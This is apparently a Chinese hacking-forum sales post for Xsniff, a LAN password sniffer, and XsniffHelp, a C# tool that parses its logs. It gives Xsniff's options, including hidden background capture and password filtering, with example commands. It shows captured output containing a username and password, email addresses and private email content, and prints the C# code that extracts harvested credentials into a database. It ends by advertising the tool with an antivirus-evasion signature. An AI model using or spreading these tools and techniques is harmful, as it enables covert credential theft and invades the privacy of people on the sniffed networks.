经过测试,Xsniff可以在winxp和win2000以及win2003下运行,可以抓局域网的密码(FTP 和POP3),但HTTP的没有配置,只能抓常见的。不用装wincap组件,而且免杀性还好,寻找源码。
简易的命令行方式嗅探器,可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。
运行参数说明:
xsniff <选项>
<选项>含义如下:
-tcp : 输出TCP数据报
-udp : 输出UDP数据报
-icmp : 输出ICMP数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr <IP地址> : 过滤IP地址
-port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件
-asc : 以ASCII形式输出
-hex : 以16进制形式输出
示例:xsniff.exe -pass -hide -log pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
------------------------------------------------------------------------------------------
嗅探结果:
TCP [08/10/11 10:27:48]
202.243.15.102->172.168.8.9 Port: 1233->110
USER admin
TCP [08/10/11 10:27:48]
202.243.15.102->172.168.8.9 Port: 1233->110
PASS #$@wer123
TCP [08/10/11 10:28:20]
202.16.8.9->172. 168.10.2 Port: 23965->25
RCPT TO:11111@126.com
TCP [08/10/11 10:28:22]
202.16.8.9->172. 168.10.2 Port: 23965->25
MAIL FROM:YYYY@163.com
TCP [08/10/11 18:29:00]
202.16.8.9->172. 168.10.2 Port: 30955->80
HOST: "
Content-Transfer-Encoding: quoted-printable
E ve tre the? BR..=20
-----Original Message-----
From: XXXX, XXX XXX \(XXXX\\Operations\)
Sent: 10/08/2011, 18:13=20
To: YYY, YYY YYYY Y \(XXXX\\Operations\)
Subject: FW: 2011 Taxation=20
------------------------------------------------------------------------------------------
xsniff.exe嗅探结果,当超过几M的时候,嗅探的东西太多,人工处理这个结果的时候,那是不可能完成的,为此写了一个XsniffHelp工具,除去重复行,除去一些非用户名和密码的嗅探结果,经测试一个8M嗅探的结果,经处理只有1M多点,效率大概6分钟左右,结果还是不错的。
注意:此工具是.net开发的,运行需要安装.net环境。
string ConnStr = DBConStr;
OleDbConnection conn = new OleDbConnection(ConnStr);
string sqlUserStr = string.Empty;
string sqlPassStr = string.Empty;
int iCount = 0;
if (string.IsNullOrEmpty(strFilePath))
{
return;
}
else
{
try
{
sqlUserStr = "insert into User_tb (X_TCP,X_IP,X_Port,X_USER) values (@xTCP,@xIP,@xPort,@xUSER)";
sqlPassStr = "insert into Pass_tb (X_TCP,X_IP,X_Port,X_PASS) values (@xTCP,@xIP,@xPort,@xPASS)";
fs = new FileStream(strFilePath, FileMode.Open);
srReader = new StreamReader(fs);
string[] sLinkArray1 = null;
string[] sLinkArray2 = null;
string[] sLinkArray3 = null;
string strLine1 = ""; //TCP [08/10/11 10:27:48]
string strLine2 = ""; //171.243.15.102->172.16.8.9 Port: 1233->110
string strLine3 = ""; //USER|PASS|其它
string strLine4 = ""; //空行
int tag = 0;
while (srReader.Peek() != -1)
{
//读取一行文本
tag++;
switch (tag)
{
case 1:
strLine1 = srReader.ReadLine().Trim();
if (!strLine1.StartsWith("TCP"))
{
tag = tag - 1;
}
break;
case 2:
strLine2 = srReader.ReadLine().Trim();
break;
case 3:
strLine3 = srReader.ReadLine().Trim();
break;
case 4:
strLine4 = srReader.ReadLine().Trim();
break;
default:
break;
}
if (strLine1 != "" && strLine2 != "" && strLine3 != "" && ((tag == 4) || (tag == 3 && srReader.Peek() == -1)))
{
if (strLine3.StartsWith("USER"))
{
sLinkArray1 = strLine1.Split('[');
sLinkArray2 = strLine2.Split('-');
sLinkArray3 = strLine3.Split(' ');
OleDbCommand olecmd = new OleDbCommand(sqlUserStr, conn);
olecmd.CommandType = CommandType.Text;
olecmd.Parameters.AddWithValue("@xTCP", sLinkArray1[1].ToString().Substring(0, sLinkArray1[1].Length-2));
olecmd.Parameters.AddWithValue("@xIP", sLinkArray2[0].ToString());
olecmd.Parameters.AddWithValue("@xPort", sLinkArray2[2].ToString().Substring(1, sLinkArray2[2].Length - 1));
if (sLinkArray3.Length == 2 && sLinkArray3[1].Trim() != "" && sLinkArray3[1].Trim() != null)
{
olecmd.Parameters.AddWithValue("@xUSER", sLinkArray3[1].ToString());
}
else
{
olecmd.Parameters.AddWithValue("@xUSER", "UUUUUUUUUUUUUUUUUUUUU");
}
try
{
conn.Open();
int i = olecmd.ExecuteNonQuery();
conn.Close();
iCount++;
}
catch (Exception excep)
{
conn.Close();
MessageBox.Show(excep.Message + "strLine3:" + strLine3);
}
}
if (strLine3.StartsWith("PASS"))
{
sLinkArray1 = strLine1.Split('[');
sLinkArray2 = strLine2.Split('-');
sLinkArray3 = strLine3.Split(' ');
OleDbCommand olecmd = new OleDbCommand(sqlPassStr, conn);
olecmd.CommandType = CommandType.Text;
olecmd.Parameters.AddWithValue("@xTCP", sLinkArray1[1].ToString().Substring(0, sLinkArray1[1].Length - 2));
olecmd.Parameters.AddWithValue("@xIP", sLinkArray2[0].ToString());
olecmd.Parameters.AddWithValue("@xPort", sLinkArray2[2].ToString().Substring(1, sLinkArray2[2].Length - 1));
if (sLinkArray3.Length == 2 && sLinkArray3[1].Trim() != "" && sLinkArray3[1].Trim() != null)
{
olecmd.Parameters.AddWithValue("@xPASS", sLinkArray3[1].ToString());
}
else
{
olecmd.Parameters.AddWithValue("@xPASS", "PPPPPPPPPPPPPPPPPPPP");
}
try
{
conn.Open();
int i = olecmd.ExecuteNonQuery();
conn.Close();
iCount++;
}
catch (Exception excep)
{
conn.Close();
MessageBox.Show(excep.Message + "strLine3:" + strLine3);
}
}
tag = 0;
}
}
srReader.Close();
MessageBox.Show("成功导入" + iCount + "条数据!", "提示");
}
catch (Exception excep)
{
MessageBox.Show(excep.Message);
}
finally
{
srReader.Close();
fs.Close();
}
}
strFilePath = string.Empty;
LoadDataGridView();
-------------------------------------------------------------------------------------------
如有需要淘宝网店拍下XsniffHelp,拍下即送免杀卡巴斯基的数字签名。